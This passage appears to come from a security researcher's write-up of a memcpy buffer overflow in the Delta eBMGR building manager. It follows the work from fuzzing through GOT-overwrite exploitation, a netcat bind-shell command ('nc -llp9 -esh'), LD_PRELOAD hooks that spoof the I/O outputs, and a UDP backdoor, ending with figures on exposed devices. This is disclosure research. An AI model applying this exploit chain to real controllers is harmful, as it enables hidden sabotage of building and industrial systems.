Examining further, we could quickly see that the fuzzer had created a packet with a BACnet layer size of 8216 bytes, filled with the byte 0x22. We could also see the fuzzer recognized the maximum acceptable size for the BACnet application layer as only 1476 bytes. Additional testing showed that sending only this packet did not produce the same results; only when all 97 packets were sent did the crash occur.
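For context, a well-formed BACnet/IP broadcast is tiny. The sketch below builds a standard Who-Is broadcast frame (derived from the BACnet specification, not from the device) and shows the 16-bit BVLC length field that the fuzzer inflated to 8216:

```python
import struct

# A minimal, well-formed BACnet/IP "Who-Is" broadcast frame.
npdu = bytes([0x01, 0x20, 0xFF, 0xFF, 0x00, 0xFF])  # network layer, global broadcast
apdu = bytes([0x10, 0x08])                          # unconfirmed-request, Who-Is
payload = npdu + apdu

# BVLC header: type 0x81 (BACnet/IP), function 0x0B (Original-Broadcast-NPDU),
# then a 16-bit big-endian length covering the whole frame, header included.
bvlc = struct.pack(">BBH", 0x81, 0x0B, 4 + len(payload))
frame = bvlc + payload

print(frame.hex())  # 810b000c0120ffff00ff1008
```

The malformed fuzzer frames kept this same header layout but declared a vastly larger payload than the application layer can legitimately carry.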

Analyzing the Crash

Since the system provides a core dump upon crashing, it was logical to analyze it for further information. From the core dump (reproduced in Figure 7), we could see the device encountered a segmentation fault. We also saw that register R0 contained what looked like data copied from our malformed packet, along with the backtrace being potentially corrupted.

Figure 7

The core dump also provided us the precise location of the crash. Using the memory map from the device, we determined that address 0x4026e580 is located in memcpy. Since the device does not deploy Address Space Layout Randomization (ASLR), the memory address did not change throughout our testing. As we had successfully extracted the firmware, we used IDA Pro to learn more about why this crash was occurring. The developers did not strip the binaries at compile time, which helped simplify the reversing process in IDA.

Figure 8

The disassembly told us that memcpy was attempting to write what was in R3 to the “address” stored in R0. In this case, however, we had corrupted that address, causing the segmentation fault. The contents of several other registers also provided additional information. The value 0x81 in R3 was potentially the first byte of a BACnet packet from the BACnet Virtual Link Control (BVLC) layer, identifying the packet as BACnet. By looking at R3 and the values at the address in R5 together, we confirmed with more certainty that this was in fact the BVLC layer. This implied the data being copied was from the last packet sent and the destination for the copied data was taken from the first malformed packet.

Registers R8 and R10 held the source and destination port numbers, respectively, which in this case were both 0xBAC0 (accounting for endianness), or 47808, the standard BACnet port. R4 held a memory address which, when examined, showed a section of memory that looks to have been overwritten. Here we saw data from our malformed packet (0x22); in some areas, memory was partially overwritten with our packet data. The value for the destination of the memcpy appeared to be coming from this region of memory. With no ASLR enabled, we could again count on this always landing in the same location.

Figure 9

At this point, with the information provided by the core dump, packets, and IDA, we were fairly certain that the crash found was a buffer overflow. However, memcpy is a very common function, so we needed to determine where exactly this crash was coming from. If the destination address for the memcpy was getting corrupted, then the crash in memcpy was simply collateral damage from the buffer overflow – so what code was causing the buffer overflow to occur? A good place to start this analysis would be the backtrace; however, as seen above, the backtrace was corrupted by our input. Since this device uses an ARM processor, we could look at the LR register for clues on what code called this memcpy. Here, LR was pointing to 0x401e68a8 which, when referencing the memory map of the process, falls in “main.so”. After calculating the offset to use for static analysis, we arrived at the code in Figure 10.

Figure 10

The LR register was pointing to the instruction which is called after memcpy returns. In this case, we were interested in the instruction right before the address LR is pointing to, at offset 0x15C8A4. At first glance, we were surprised not to see the expected memcpy call; however, digging a little deeper into the scNetMove function we found that scNetMove is simply a wrapper for memcpy.

Figure 11

So, how did the wrong destination address get passed to memcpy? To answer this, we needed a better understanding of how the system processes incoming packets, along with what code is responsible for setting up the buffers sent to memcpy. Using ps on the running system, we could see that the main process spawns 19 threads:

Table 1

The function in which we found the “scNetMove” call is named “scBIPRxTask”, and it is referenced in only one other location outside of the main binary: the initialization function for the application’s networking, shown in Figure 12.

Figure 12

In scBIPRxTask’s disassembly, we saw a new thread or “task” being created for both BACnet IP interfaces, on ports 47808 and 47809. These spawned threads handle all incoming packets on their respective ports, triggering once per packet received. Using the IDA Pro decompiler, we could see what occurs for each packet. First, the function uses memset to zero out an allocated buffer on the stack and reads from the network socket into this buffer. This buffer becomes the source for the following memcpy call. The buffer is created with a static size of 1732 bytes, and at most 1732 bytes are read from the socket.

Figure 13

After reading data from the socket, the function sets up a place to store the packet it has just received. Here it uses a function called “pk_alloc,” which takes the size of the packet to create as its only argument. We noticed that the size was another static value and not the size received from the socket read function. This time the static value passed is 1476 bytes. This allocated buffer is what will become the destination for the memcpy.

Figure 14

With both a source and destination buffer allocated, “scNetMove” is called and subsequently memcpy is called, passing both buffers along with the size parameter taken from the socket read return value.

Figure 15

This code path explains why and how the vulnerability occurs. Each packet received is copied from the stack buffer into memory; however, if the packet is longer than 1476 bytes, every byte beyond 1476 (up to the 1732-byte read limit) overwrites memory past the end of the destination buffer. Within the memory which is overwritten lies an address used as the destination of a later memcpy call. This means the buffer overflow leads to an arbitrary write condition. The first malformed packet overwrites a section of memory with attacker-defined data – in this case, the address the attacker wishes to write to. After an additional 95 packets are read by the system, the attacker-controlled address is passed to memcpy as the destination buffer. The data in the last packet, which does not need to be malformed, is what gets written to the location set by the earlier malformed packet. Assuming the last packet is also controlled by the attacker, this is now a write-what-where condition.
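The size mismatch can be summarized in a few lines. The 1476- and 1732-byte constants come from the disassembly discussed above; the helper itself is just an illustrative model, not code from the device:

```python
DEST_SIZE = 1476   # pk_alloc'd destination packet buffer
SRC_SIZE = 1732    # stack buffer filled by the socket read

def bytes_overwritten(packet_len):
    """How many bytes past the end of the destination buffer a packet
    of this length overwrites, per the flow described above."""
    copied = min(packet_len, SRC_SIZE)   # the read caps at the stack buffer size
    return max(0, copied - DEST_SIZE)

assert bytes_overwritten(1476) == 0     # fits exactly: no overflow
assert bytes_overwritten(1477) == 1     # one byte past the allocation
assert bytes_overwritten(8216) == 256   # the fuzzer's frame: capped at 1732 - 1476
```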

Kicking the Dog

With a firm grasp on the discovered vulnerability, the next logical step was to attempt to create a working exploit. When developing an exploit, the ability to dynamically debug the target is extremely valuable. To this end, the team first had to cross-compile debugging tools such as gdbserver for the device’s specific kernel and architecture. Since the device runs an old version of the Linux kernel, we used an old version of Buildroot to build gdbserver and later other applications.

Using a USB drive to transfer gdbserver onto the device, an initial attempt to debug the running application was made. A few seconds after connecting the debugger to the application, the device initiated a reboot, as shown in Figure 16.

 

Figure 16

An error message gave us a clue as to why the crash occurred, indicating a watchdog timer failure. Watchdog timers are common in critical embedded devices: if the system hangs for a predetermined amount of time, the watchdog takes action to try to correct the problem. In this case, the action chosen by the developers is to reboot the system. Searching the system binaries for this error message revealed the section of code shown in Figure 17. The actual error messages have been redacted at the request of the vendor.

 

Figure 17

The function is decrementing three counters. If any of the counters ever gets to zero, an error is thrown and the system is later rebooted. Examining the code further showed that multiple processes call this function very frequently to check the counters. This means we would not be able to dynamically debug the system without figuring out how to disable this software watchdog.

One common approach to this problem is to patch the binaries. It is important when looking at patching a binary to ensure the patch you employ does not introduce any unintended side effects. This generally means you want to make the smallest change possible. In this case, the smallest meaningful change the team came up with was to modify the “subtract by 5” to a “subtract by 0.”  This would not change how the overall program functioned; however, every time the function was called to decrement the counter, the counter would simply never get smaller. The patched code is provided in Figure 18. Notice the IDA decompiler has completely removed the subtraction statement from the code since it is no longer meaningful.

 

Figure 18
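The watchdog logic described above – counters decremented on each check, reboot at zero, patched to subtract zero – can be modeled in a few lines. The values are illustrative only; the device’s real counters and decrement interval differ:

```python
def checks_until_reboot(counter, step):
    """Number of checks before the counter reaches zero and the system
    reboots; None if it never will (the patched case)."""
    if step <= 0:
        return None   # "subtract by 0": the counter never shrinks
    checks = 0
    while counter > 0:
        counter -= step
        checks += 1
    return checks

# Illustrative values only.
assert checks_until_reboot(100, 5) == 20    # stock binary: reboot eventually
assert checks_until_reboot(100, 0) is None  # patched binary: never reboots
```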

With the software watchdog patched, the team attempted to again dynamically debug the application. Initially the test was thought to be successful, since it was possible to connect to gdbserver and start debugging the application. However, after three minutes the system rebooted again. Figure 19 shows the message the team caught on reboot after several repeated experiments with the same results.

 

Figure 19

This indicates that during the boot phase, a hardware watchdog is set to 180 seconds (three minutes). The system has two watchdog timers, one hardware and one software, and we had only disabled one of them. The binary-patching method used to disable the software watchdog timer would not work here, since something would still need to actively kick the hardware watchdog to prevent a reboot. Armed with this knowledge, we turned to the Delta binaries on the device for code that could help us “kick” the hardware watchdog. With the debugging symbols left in, it was relatively easy to find a function responsible for managing the hardware watchdog.

There are several approaches which could be used to attempt to disable the hardware watchdog. In this scenario, we decided to take advantage of the fact that the code which dealt with the hardware watchdog was in a shared library and exported. This allowed for the creation of a new program using the existing watchdog-kicking code. By creating a second program that will kick the hardware watchdog, we could debug the Delta application without the system resetting.

This program was put in the init script of the system, so it would run on boot and continually “kick the dog”, effectively disabling the hardware watchdog. Note: no actual dogs were harmed in the research or creation of this exploit. If anything, they were given extra treats and contributed to the coding of the watchdog patch. Here are some very recent photos of this researcher’s dogs for proof.

 

Figure 20

With both the hardware and software watchdog timers pacified, we could continue to determine if our previously discovered vulnerability was exploitable.

Writing the Exploit

Before attempting exploitation, we wanted to first investigate if the system had any exploit mitigations or limitations we needed to be aware of. We began by running an open source script called “checksec.sh”. This script, when run on a binary, will report if any of the common exploit mitigations are in place. Figure 21 shows the script’s output when run on the primary Delta binary, named “dactetra”.

Figure 21

The check came back with only NX enabled. This also held true for each of the shared libraries where the vulnerable code is located.

As discussed above, the vulnerability allows for a write-what-where condition, which leads us to the most important question: what do we want to write where? Ultimately, we want to write shellcode somewhere in memory and then jump to that shellcode. Since the attacker controls the last packet sent, it is plausible that the attacker could have their shellcode on the stack. If we put shellcode on the stack, we would then have to bypass the No eXecute (NX) protection discovered using the checksec tool. Although this is possible, we wondered if there was a simpler method.

Reexamining the crash dump at the memory location which has been overwritten by the large malformed packet, we found a small contiguous section of heap memory, totaling 32 bytes, which the attacker could control. We came to this conclusion because of the presence of 0x22 bytes – the contents of the malformed packet’s payload. At the time the overflow occurs, more of this region is filled with 0x22’s, but by the time our write-what-where condition is triggered, many of these bytes get clobbered, leaving us with the 32-byte section shown in Figure 22.

Figure 22

Being heap memory, this region was also executable, a detail that will become important shortly. Replacing the 0x22’s in the malformed packet with a non-repeating pattern both revealed where in the payload to place our shell code and confirmed that the bytes in this region were all unique.

With a potential place to put our shellcode, the next major component to address was controlling execution. The write-what-where condition allowed us to write anywhere in memory; however, it did not give us control of execution. One technique to tackle this problem is to leverage the Global Offset Table (GOT). In Linux, the GOT redirects a function pointer to an absolute location and is located in the .got section of an ELF executable or shared object. Since the .got section is written to at execution time, it is generally still writable later during execution. Relocation Read Only (RELRO) is an exploit mitigation which marks the loaded .got section read-only once it is mapped; however, as seen above, this protection was conveniently not enabled. This meant it was possible to use the write-what-where condition to write the address of our shellcode to the GOT, replacing a function pointer for a future function call. Once the replaced function pointer is called, our shellcode would be executed.
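As a small aside, GOT entries on this 32-bit little-endian ARM target are stored as 4-byte little-endian words, so overwriting one means landing those exact bytes in memory. A quick sketch with a purely illustrative address:

```python
import struct

addr = 0x40101234                  # purely illustrative pointer value
entry = struct.pack("<I", addr)    # how the pointer sits in the GOT

# Little-endian: least significant byte first in memory.
assert entry == b"\x34\x12\x10\x40"
assert struct.unpack("<I", entry)[0] == addr
```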

But which function pointer should we replace? To ensure the highest probability of success, we decided it would be best to replace the pointer to a function that is called as close to the overwrite as possible. This is because we wanted to minimize changes to the memory layout during program execution. Examining the code again from the return of the “scNetMove” function, we see within just a few instructions “scDecodeBACnetUDP” is called. This therefore becomes the ideal choice of pointer to overwrite in the GOT.

Figure 23

Knowing what to write where, we next considered any conditions which needed to be met for the correct code path to be taken to trigger the vulnerability. Taking another look at the code in memcpy that allows the buffer overflow to occur, we noticed that the overwrite does indeed have a condition, as shown in Figure 24.

Figure 24

The code path producing the overwrite in memory is only taken if the value in R0, when bitwise ANDed with the immediate value 3, is not equal to 0. From our crash dump, we knew that the value in R0 is the destination address of the copy. This potentially posed a problem: if the address we wanted to write to was 4-byte aligned, which was highly likely, the vulnerable code path would not be taken. We could ensure our code path was taken by subtracting one from the address we wished to write to in the GOT and then repairing the last byte of the previous entry. This guarantees the correct code path is taken and that we do not unintentionally damage a second function pointer.
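The alignment trick boils down to simple arithmetic; the GOT address below is illustrative:

```python
got_entry = 0x40200000   # illustrative 4-byte-aligned GOT address

# Aligned addresses fail the (R0 & 3) != 0 check, so the vulnerable
# copy path would be skipped for the entry itself...
assert got_entry & 3 == 0
# ...but aiming one byte earlier passes the check. The first byte
# written then repairs the previous entry's last byte before the
# target pointer is overwritten.
assert (got_entry - 1) & 3 != 0
```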

Shellcode

While we discovered a place to put our shellcode, it offers only a very small amount of space – specifically, the 32 bytes shown in Figure 22. What can we accomplish in such a small amount of space? One method that does not require extensive shellcode is a “return to libc” attack that calls libc’s system function. For our exploit to work out of the box, whatever command or program we run with system must be present on the device by default. Additionally, the command string itself needs to be quite short to accommodate the limited number of bytes we have to work with.

An ideal scenario would be executing code that would allow remote shell access to the device. Fortunately, Netcat is present on the device and this version of Netcat supports both the “-ll” flag, for persistent listening on a port for a connection, and the “-e” flag, for executing a command on connection. Thus, we could use system to execute Netcat to listen on some port and execute a shell when a connection is made. Before writing shell code to execute system with this command, we first tested various Netcat commands on the device directly to determine the shortest Netcat command that would still give us a shell. After a few iterations, we were able to shorten the Netcat command to 13 bytes:

nc -llp9 -esh

Since the instructions must be 4-byte-aligned and we have 32 bytes to work with, we are only concerned with the length of the string rounded up to the nearest multiple of 4, so in this case 16 bytes. Subtracting this from our total 32 bytes, we have 16 bytes left, or 4 instructions total, to set up the argument for system and jump to it. A common method to fit more instructions into a small space in memory on ARM is to switch to Thumb mode. This is because ARM’s Thumb mode utilizes 16-bit (2-byte) instructions, instead of the regular 32-bit (4-byte) ARM instructions. Unfortunately, the processor on this device did not support Thumb mode and therefore this was not an option.
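The byte accounting above works out as follows; this is just a sanity check of the arithmetic, with the constants taken from the analysis:

```python
CMD = "nc -llp9 -esh"
TOTAL = 32     # bytes of attacker-controlled, executable heap memory
WORD = 4       # ARM instructions are 4 bytes and must be 4-byte aligned

assert len(CMD) == 13
cmd_space = -(-len(CMD) // WORD) * WORD   # round up to a multiple of 4
assert cmd_space == 16
instructions = (TOTAL - cmd_space) // WORD
assert instructions == 4   # entire budget for setting up and calling system
```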

The challenge to accomplishing our task in only 4 ARM instructions is the limit ARM places on immediate values. To jump to system, we needed to use an immediate value as the address to jump to, but memory addresses are not generally small values. Immediate values in ARM are limited to 12 bits: eight of these bits hold the value itself and the other four encode a rotation. This means an immediate value can only be one byte long (two hex digits), but that byte can be rotated into position anywhere in the word. Therefore, loading a full 4-byte memory address using immediate values would take all 4 instructions, whether using MOV or ADD. While we do have 4 instructions to play with, we also need at least one instruction to load the address of our command string into R0, the register used as the first parameter of system, and at least one instruction to branch to the address, requiring a total of 6 instructions.
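This encoding constraint – more precisely, an 8-bit constant rotated right by an even amount – can be checked programmatically. A small sketch:

```python
def is_arm_immediate(value):
    """True if a 32-bit value fits ARM's immediate encoding:
    an 8-bit constant rotated right by an even amount (0..30)."""
    for rot in range(0, 32, 2):
        # Rotating left by 'rot' undoes a right-rotation by 'rot'.
        undone = ((value << rot) | (value >> (32 - rot))) & 0xFFFFFFFF
        if undone < 0x100:
            return True
    return False

assert is_arm_immediate(0x51000)         # 0x51 rotated into place
assert is_arm_immediate(0x7F0)           # 0x7F rotated into place
assert not is_arm_immediate(0x517F0)     # too wide for a single immediate
assert not is_arm_immediate(0x402874A4)  # a full address never fits
```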

One way to reduce the number of instructions needed is to start by copying a register already containing a value close to the address we want at the time the shellcode executes. Whether this is feasible depends on the value of the address we want to jump to compared to the addresses we have available in the registers right before our shell code is executed.

Starting with the address we need to call, we discovered three addresses we could jump to that would call system.

  1. 0x4006425C – the address of a BL system (branch to system) instruction in boot.so.
  2. 0x40054510 – the address of the system entry in “boot.so”’s GOT.
  3. 0x402874A4 – the direct address of system in libuClibc-0.9.30.so.

Next, we compared these options to the values in the registers at the time the shellcode is about to execute using GDB, shown in Figure 25.

Figure 25

Of the registers we have access to at the time our shell code executes, the one that gives us the smallest delta between its contents and one of these three addresses we can use to call system is R4. R4 contains 0x40235CB4, giving a delta of 0x517F0 when compared to the address for a direct call to system. The last nibble being 0 is ideal since that means we don’t have to account for the last bit, thanks to the rotation mechanism inherent to ARM immediate values. This means that we only need two immediate values to convert the contents of R4 into our desired address: one for 0x51000, the other for 0x7F0. Since we can apply an immediate offset when MOV’ing one register into another, we should be able to load a register with the address of system in only two instructions. With one instruction for performing the branch and 16 bytes for the command string, this means we can get all our shell code in 32 bytes, assuming we can load R0 with the address of our string in one instruction.
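The register math checks out; the addresses below are taken from the analysis above:

```python
R4     = 0x40235CB4   # register contents just before our shellcode runs
SYSTEM = 0x402874A4   # address of system in libuClibc-0.9.30.so

delta = SYSTEM - R4
assert delta == 0x517F0
# The delta splits into two ARM-encodable immediates, so the target
# address can be rebuilt from R4 in just two instructions:
assert delta == 0x51000 + 0x7F0
```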

By starting our ASCII string for the command directly after the fourth and last instruction, we can copy PC into R0 with the appropriate offset to make it point to the string. An added benefit of this approach is that it makes the string’s address independent of where the shell code is placed into memory, since it’s relative to PC. Figure 26 shows what the shellcode looks like with consideration for all restrictions.

Figure 26

It is important to note that the “.asciz” assembler directive is used to place a null-terminated ASCII string literal into memory. R12 was chosen as the register to hold the branch target, since R12 is the intra-procedure-call (IP) scratch register on the ARM architecture. This means R12 is often used as a general-purpose register within subroutines, so it is almost certainly safe to clobber for our purposes without unexpected adverse effects.

Piecing Everything Together

With a firm understanding of the vulnerability, the exploit, and the shellcode needed, we could now attempt exploitation. This is not a single-packet attack but a multi-packet one. The initial buffer overflow is contained in the large malformed packet, so what data do we build into it? This packet overwrites memory but does not provide control over execution; therefore, it can be considered the “setup” or “staging” packet. It defines where memcpy will look for the address of the destination buffer for our last packet. The address we want to overwrite goes in this packet, followed by our shellcode. As explained above, the address we are looking to overwrite is the address of the scDecodeBACnetUDP function pointer in the GOT, minus one to ensure the address isn’t 4-byte aligned. By repairing the last byte of the previous function pointer and overwriting this address, we can gain execution control.

The large malformed packet contains “where” we want to “write” to and puts our shellcode into memory yet does not contain “what” we want to write. The “what”, in this case, is the address of our shellcode, so our last packet needs to contain this address. The final challenge is deciding where in the last packet the address belongs.

Recall from the core dump shown previously that the crash happens when memcpy attempts to write the value 0x81 to the bad address. 0x81 is the first byte of the BVLC layer, indicating this is where our address needs to go within the last packet to ensure that only the address we want is overwritten. We also need to ensure there are no bytes after our address; otherwise, we would continue to overwrite the GOT past our target address. Since this is a multi-threaded application, that could cause the application to crash before our shellcode has a chance to execute. Since the BVLC layer is typically how a packet is identified as a BACnet packet, a potential problem with altering this layer is that the last packet will no longer look like a BACnet packet. If this is the case, will the application still ingest the packet? The team tested this and discovered that the application will ingest any broadcast packet regardless of type, since the vulnerable code executes before the code that validates the packet type.
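Concretely, the final packet’s payload can be sketched as follows (the shellcode address is hypothetical; only its placement at the BVLC type byte and the need to end the packet immediately afterward follow from the analysis above):

```python
import struct

SHELLCODE_ADDR = 0x40300000  # hypothetical address where shellcode was staged

# The 4-byte address sits where the BVLC type byte (0x81) would normally be,
# and the packet ends right after it so that only one GOT entry is clobbered.
final_packet = struct.pack("<I", SHELLCODE_ADDR)  # little-endian, as on ARM

assert len(final_packet) == 4  # no trailing bytes to spill past the target
```

Any extra trailing bytes would keep overwriting GOT entries past the target, which is exactly the multi-threaded crash risk described above.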

Taking everything into account and sending the series of 97 packets, we were able to successfully exploit the building manager by creating a bind shell. Below is a video demonstrating this attack:

A Real-world Scenario

Although providing a root shell to an attacker proves the vulnerability is exploitable, what can an attacker do with it? A shell by itself does not prove useful unless an attacker can control the normal operation of the system or steal valuable data. In this case, there is not a lot of useful data stored on the device. Someone could download information about how the system is configured or what it’s controlling, which may have some value, but this will not hold significant impact on its own. An attacker could also delete essential system files, a denial-of-service attack that could easily leave the target in an unusable state, but pure destruction is also of low value for various reasons. First, as mentioned previously, the device has a backup image that it will fall back to if a failure occurs during the boot process. Without physical access to the device, an attacker wouldn’t have a clear idea of how the backup image differs from the original or even if it is exploitable. If the backup image uses a different version of the firmware, the exploit may no longer work. Perhaps more importantly, a denial-of-service attack suffers from its inherent lack of subtlety. If the attack immediately causes alarms to go off when executed, the attacker can expect that their persistence in the system will be short-lived.

What if the system could be controlled by an attacker while being undetected?  This scenario becomes more concerning considering the type of environments controlled by this device.

Normal Programming

Controlling the standard functions of the device from just a root shell requires a much deeper understanding of how the device works in a normal setting. Typically, the Delta eBMGR is programmed by an installer to perform a specific set of tasks. These tasks can range from managing access control, to building lighting, to HVAC, and more. Once programmed, the controller is connected to several external input/output (I/O) modules. These modules are utilized for both controlling the state of an attached device and relaying information back to the manager. To replicate these “normal conditions”, we had a professional installer program our device with a sample program and attach the appropriate modules.

Figure 27 shows how each component is connected in our sample programming.  For our initial testing, we did not actually have the large items such as the pump, boiler and heating valve. The state of these items can be tracked through either LEDs on the modules or the touchscreen interface, hence it was unnecessary for us to acquire them for testing purposes. Despite this, it is still important to note which type of input or output each “device”, virtual or otherwise, is connected to on the modules.

Figure 27

The programming to control these devices is surprisingly simple. Essentially, based on the inputs, an output is rendered. Figure 28 shows the programming logic present on the device during our testing.

Figure 28

There are three user-defined software variables: “Heating System”, “Room Temp Spt”, and “Heating System Enable Spt”.  Here, “spt” indicates a set point. These can be defined by an operator at run time and help determine when an output should be turned on or off. The “Heating System” binary variable simply controls the on/off state of the system.

Controlling the Device

As when we first started looking for vulnerabilities, we want to ensure our method of controlling the device is not dependent on code that could vary from controller to controller. Therefore, we want to find a method that allows us to control all the I/O devices attached to a Delta eBMGR, ensuring we are not dependent on this device’s specific programming.

As on any Linux-based system, the installer-defined programming at its lowest level utilizes system calls, or functions, to control the attached hardware. By finding a way to manipulate these functions, we would therefore have a universal method of controlling the modules regardless of the installer programming.  A very common way of gaining this type of control when you have root access to a system is through the use of function hooking. The first challenge for this approach is simply determining which function to hook. In our case, this required an extensive amount of reverse engineering and debugging of the system while it was running normally. To help reduce the scope of functions we needed to investigate, we began by focusing our attention on controlling binary output (BO). Our first challenge was how to find the code that handles changing the state of a binary output.

A couple of key factors helped point us in the right direction. First, the documentation for the controller indicates the device talks to the I/O modules over a Controller Area Network (CAN) bus, which is common for PLC devices.  As previously seen, the Delta binaries all have symbols included.  Thus, we can use the function names provided in the binaries to reduce the code surface we need to look at: IDA tells us there are only 28 functions with “canio” as the first part of their name. Second, we can assume that since changing the state of a BO requires a call to physical hardware, a Linux system call is needed to make that change. Since the device is making a change to an I/O device, it is highly likely that the Linux system call used is “ioctl”. When cross-referencing the functions that start with “canio” with those that call “ioctl”, our prior search space of 28 drops to 14. One function name stood out above the rest: “canioWriteOutput”. The decompiled version of the function is reproduced in Figure 29.

Figure 29

To test this hypothesis, we set a breakpoint on the call to “ioctl” inside canioWriteOutput and used the touchscreen to change the state of one of the binary outputs from “off” to “on”. Our breakpoint was hit! Single-stepping over the breakpoint, we saw the correct LED light up, indicating the output was now on.

Now knowing the function we needed to hook, the question quickly became: How do we hook it? There are several methods to accomplish this task, but one of the simplest and most stable is to write a library that the main binary will load into memory during its startup process, using an environment variable called LD_PRELOAD. If a path or multiple paths to shared objects or libraries are set in LD_PRELOAD before executing a program, that program will load those libraries into its memory space before any other shared libraries. This is significant, because when Linux resolves a function call, it looks for function names in the order in which the libraries are loaded into memory. Therefore, if a function in the main Delta binary shares a name and signature with one defined in an attacker-generated library that is loaded first, the attacker-defined function will be executed in its place. As the attacker has a root shell on the device, it is possible for them to modify the init scripts to populate the LD_PRELOAD variable with a path to an attacker-generated library before starting the Delta software upon boot, essentially installing malware that executes upon reboot.

Using the cross-compile toolchain created in the early stages of the project, it was simple to test this theory with the “library” shown in Figure 30.

Figure 30

The code above doesn’t do anything meaningful, but it does confirm that hooking this function works as expected.  We first defined a function pointer using the same function prototype we saw in IDA for canioWriteOutput.  When canioWriteOutput is called, our function will be called first, creating an output file in the “opt” directory and giving us a place to write text, proving that our hook is working. Then, we search the symbol table for the original canioWriteOutput and call it with the same parameters passed into our hook, essentially creating a passthrough function. The success of this test confirmed this method would work.

For our function hook to do more than just act as a passthrough, we needed to understand what parameters were being passed to the function and how they affect execution. By using GDB, we could examine the data passed in during both the “on” and “off” states. For canioWriteOutput, it was discovered that the state of the binary output was encoded into the second parameter passed to the function. From there, we could theoretically control the state of the binary output by simply passing the desired state as the second parameter to the real function, leaving the other parameters as-is. In practice, however, the state change produced using this method persisted only for a split second before the device reset the output back to its proper state.

Why was the device returning the output to the correct state? Is there some type of protection in place? Investigating strings in the main Delta binary and the filesystem on the device led us to discover that the device software maintains databases on the filesystem, likely to preserve device and state information across reboots. At least one of these databases is used to store the state of binary outputs along with, presumably, other kinds of I/O devices. With further investigation using GDB, we discovered that the device is continuously polling this database for the state of any binary outputs and then calling canioWriteOutput to publish the state obtained from the database, clobbering whatever state was there before. Similarly, changes to this state made by a user via the touchscreen are stored in this same database. At first, it may appear that the simplest solution would be to change the database value since we have root access to the device. However, the database is not in a known standard format, meaning we would need to take the time to reverse this format and understand how the data is stored. As we already have a way to hook the functions, controlling the outputs at the time canioWriteOutput is called is simpler.

To accomplish this, we updated our malware to keep track of whether the attacker has made a modification to the output or not. If they have, the hook function replaces the correct state, stored in canioWriteOutput’s second parameter, with the state asserted by the attacker before calling the real canioWriteOutput function. Otherwise, the hook function acts as a simple passthrough for the real deal. A positive side effect of this, from the attacker’s perspective, is the touchscreen will show the output as the state the user last requested even after the malware has modified it. Implementing this simple state-tracking resolved our prior issue of the attacker-asserted state not persisting.
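The decision logic of that state-tracking hook can be modeled in a few lines (a language-agnostic sketch in Python; the real implementation is a C library loaded via LD_PRELOAD, and the names below are ours):

```python
class OutputHook:
    """Models the hook wrapped around the real canioWriteOutput."""
    def __init__(self, real_write):
        self.real_write = real_write   # the original canioWriteOutput
        self.override = {}             # output index -> attacker-asserted state

    def write_output(self, index, state):
        # If the attacker has asserted a state for this output, substitute it;
        # otherwise act as a pure passthrough to the real function.
        effective = self.override.get(index, state)
        return self.real_write(index, effective)

log = []
hook = OutputHook(lambda idx, st: log.append((idx, st)))
hook.write_output(0, "on")             # passthrough: device state wins
hook.override[0] = "off"               # attacker asserts a state
hook.write_output(0, "on")             # polling loop still says "on"...
assert log == [(0, "on"), (0, "off")]  # ...but "off" reaches the hardware
```

Because the database polling loop keeps calling the hook with the user’s requested state, the touchscreen continues to display that state while the hardware quietly does what the attacker asked.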

With control of the binary output, we moved on to looking at each of the other types of inputs and outputs that can be connected to the modules. We used a similar approach in identifying the methods used to read or write data from the modules and then hooking them. Unfortunately, not every function was as simple as canioWriteOutput. For example, when reversing the functions used to control analog outputs, we noticed that they utilized custom data structures to hold various information about the analog device, including its state. As a result, we had to first reverse the layout of these data structures to understand how the analog information was being sent to the outputs before we could modify their state. By using a combination of static and dynamic analysis, we were able to create a comprehensive malicious library to control the state of any device connected to the manager.

Taking our Malware to the Next Level

Although making changes from a root shell certainly proves that an attacker can control the device once it has been exploited, it is more practical and realistic for the attacker to have complete remote control not contingent on an active shell. Since we were already loading a library on startup to manipulate the I/O modules, we decided it would also be feasible to use that same library to create a command-and-control style infrastructure. This would allow an attacker to send commands remotely to the “malware” without having to maintain a constant connection or shell access.

To bring this concept to life, we needed to create a backdoor, and an initialization function was probably the best place to put one. After some digging, we found “canioInit”, a function responsible for initializing the CAN bus. Since the CAN bus is required to make any modifications to the operation of the device, it made sense to wait for this function to be called before starting our backdoor. Unlike some of the previous hooks mentioned, we don’t make any changes to this call or its return data; we only use it as a method to ensure our backdoor is started at the proper time.

Figure 31

When canioInit is called, we first spawn a new thread and then execute the real canioInit function.  Our new thread opens a socket on UDP port 1337 and listens for very specific commands, such as “bo0 on” to turn on binary output 0, or “reset” to put the device back in the user’s control. Based on the commands provided, the “set_io_state” method called by this thread activates the necessary hooking methods to control the I/O as described in the previous section.
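A hypothetical reconstruction of that command handling follows; the command strings (“bo0 on”, “reset”) and the port number come from the write-up, while the parsing and loop structure are our sketch:

```python
import socket

def parse_command(data):
    """Map a raw UDP datagram to a (verb, output_index, state) tuple."""
    text = data.decode(errors="ignore").strip()
    if text == "reset":
        return ("reset", None, None)   # hand control back to the user
    if text.startswith("bo") and " " in text:
        target, state = text.split(" ", 1)
        if state in ("on", "off"):
            return ("set", int(target[2:]), state)
    return (None, None, None)          # ignore anything unrecognized

def serve(port=1337):
    """Runs inside the thread spawned from the canioInit hook."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        data, _ = sock.recvfrom(64)
        yield parse_command(data)      # results feed the I/O hook state

assert parse_command(b"bo0 on") == ("set", 0, "on")
```

Keeping the protocol this terse means the backdoor has no persistent connection to detect, only the occasional small UDP datagram.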

Figure 32

With a fully functioning backdoor in the memory space of the Delta software, we had full control of the device with a realistic attack chain. Figure 33 outlines the entire attack.

Figure 33

The entire process above, from sending out the malicious packets to gaining remote control, takes under three minutes, with the longest task being the reboot. Once the attacker has established control, they can operate the device without impacting what information the user is provided, allowing the attacker to stay undetected and granting them ample opportunity to cause serious damage, depending on what kind of hardware the Delta controller manages.

Real World Impact

What is the impact of an attack like this? These controllers are installed in multiple industries around the world. Via Shodan, we have observed nearly 600 internet-accessible controllers running vulnerable versions of the firmware.  We tracked eBMGR devices from February 2019 to April 2019 and found that there were a significant number of new devices available with public IP addresses.

